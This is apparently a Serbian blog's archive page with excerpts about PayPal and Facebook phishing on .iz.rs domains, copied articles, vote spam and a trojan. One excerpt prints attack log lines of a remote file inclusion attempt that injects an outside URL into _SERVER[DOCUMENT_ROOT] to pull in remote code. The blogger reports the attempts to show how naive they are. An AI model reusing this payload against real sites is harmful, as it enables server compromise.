Izbornik Zatvoriti

Phishing ponovo jaše

Pre dva meseca pisao sam o zloupotrebi domena facebook.iz.rs za pokušaj krađe lozinki korisnika Fejsbuka . Danas je otkriven još jedan takav pokušaj sa domenom city-shop.iz.rs.

Ovaj domen je registrovan, na njega je postavljen neki sadržaj koji daje utisak da se radi o internet prodavnici, mada se po sadržaju vidi da nije aktivirana. Međutim u pozadini, duboko je zakopana strana koja simulira PayPal stranu za prijavu, namenjena za krađu lozinki korisnika ovog servisa za plaćanje.

Neoprezni internet korisnici, kojima su zlonamernici nameravali da podmeću ovu stranu umesto pravog PayPal-a ne bi primetili razliku, upisali bi svoju lozinku i napravili sebi veliki problem. […]
[ ... vidi ceo članak ... ]

Posle male pauze – opet mi ukradoše članak

Nedavno sam objavio članak o geolokacionim servisima koji omogućavaju da sajtovi znaju gde se nalazite, a danas dobih „tip“ od posetioca da je isti članak video na forumu Vrnjačka banja (vrnjackabanjaforum.com) na adresi http://www.vrnjackabanjaforum.com/first/viewtopic.php?f=34&t=240

Proverim, kad ono stvarno: iskopiran je tekst, nešto je čak dopisano ispod njega ali ko ne zna, ne može da vidi da to nije deo originala, i čak je tekst potpisan. Ilustracija koja ide uz članak nije preneta, ali to je verovatno zato što sam zabranio linkovanje slika sa nepoznatih sjatova (pogledajte Hotlinking: kad vam drugi sajtovi troše resurse), a kopirača je verovatno mrzelo da sliku snimi pa postavlja na forum kopiju. […]
[ ... vidi ceo članak ... ]

Web fest spam

web-fest-250x250Glasajte za mene, glasajte za mene!

Odzvanjaju ovih dana imejl boksovi, Fejsbuk, tviter, Blogodak, Planeta i svi ostali načini masovne internet komunikacije od vapaja vebmastera da im se da glas.

I ove godine se održava Veb Fest – masa vlasnika sajtova su se prijavila da učestvuje na ovom velikom regionalnom festivalu sajtova.

Kako organizatori Veb festa nisu uvažili primedbe sa prošlog festivala da je javno nekontrolisano glasanje posetilaca besmisleno, oni su to ostavili i ove godine. I tako su napravili pravu spam pomamu, jer ove godine, mnogo žešće nego prošle, svaki sajt agituje kako zna i ume da dobije glasove publike i, neretko, ne libeći se ni zakonom zabranjenih postupaka, kao što je na primer, slanje spama. […]
[ ... vidi ceo članak ... ]

Hakerski napad na blog

Danas sam u logu primetio pokušaje napada na blog. Napadi su suviše naivni i neuspeli ali će možda nekome biti interesantno da vidi. Evo loga jedno napada sa adrese: 195.146.81.144 (host2.relline.ru)

/redirekcija-putanja-url-rewriti...avan-nacin/comment-page-1%20%20

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriti...avan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin/comment-page-1///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin?_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

Zar se ovaj stvarno nadao da će ovako nešto da prođe? Jedno tri-čeitiri godine ranije bi možda imao neku šansu da nabasa na kakav sajt koji je toliko bušan da ovaj napad uspe.

Bilo bi zanimljivo imati neki dodatak koji bi prepoznavao ovakve pokušaje pa ubijao konekcije koliko da se ne troši protok bezveze. […]
[ ... vidi ceo članak ... ]

Domaći slučaj phishing-a

Ne jednom su mi zamerali zašto insistiram na jasnim pisanim pravilima vezanim za registraciju besplatnih .iz.rs domena i zašto svaki registrovani domen prolazi ručnu proveru. Optuživan sam čak da sve to radim zato da bih zadovoljavao neku svoju sujetu i davao sebi na važnosti tako što ću da odlučujem kome ću da dozvoljavam da registruje domen. Stvar je nažalost banalna: kada je nešto besplatno velika je jagma, a naročito od onih koji su skloni zlouporebama i kriminalu.

Jedna od situacija zbog kojih je proveravanje domena neophodno se dogodila danas. Danas je registrovan domen facebook.iz.rs (ne morate otvarati sajt pošto je on već ugašen). […]
[ ... vidi ceo članak ... ]

Neće mene trojanci – malo sutra

virusDošao je i taj dan da mene smlati trojanac. Ošašavio me je ko mladog majmuna i još uvek ne znam šta se dogodilo.

Sinoć su počeli ljudi da mi prijavljuju za par sajtova da im Firefox prijavljuje da su opasni i ne dozvoljava pristup. Nisam se iznenadio, jer sam nedelju dana ranije već otkrio trojanca koji je napao četiri sajta koje administriram. Mislio sam da sam stvari doveo pod kontrolu, ali se ispostavilo da mi je nešto promaklo.

Nov, nepoznat i opasan

Trojanac koji je izvršio napad se skoro pojavio i već sam viđao slučajeve da su neki sajtovi stradali, a i pratio sam šta se sa njim dešava. […]
[ ... vidi ceo članak ... ]